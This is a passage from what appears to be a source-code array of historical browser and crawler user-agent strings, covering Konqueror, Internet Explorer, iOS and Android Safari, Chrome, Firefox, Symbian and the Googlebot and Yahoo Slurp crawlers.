"Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0",
"Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12",
"Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13",
"Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0",
"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145",
"Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3",
"Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941",
"Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 ",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (PLAYSTATION 3; 1.10)",
"Mozilla/5.0 (PLAYSTATION 3; 2.00)",
"Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0",
"Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525",
"Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2",
"Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
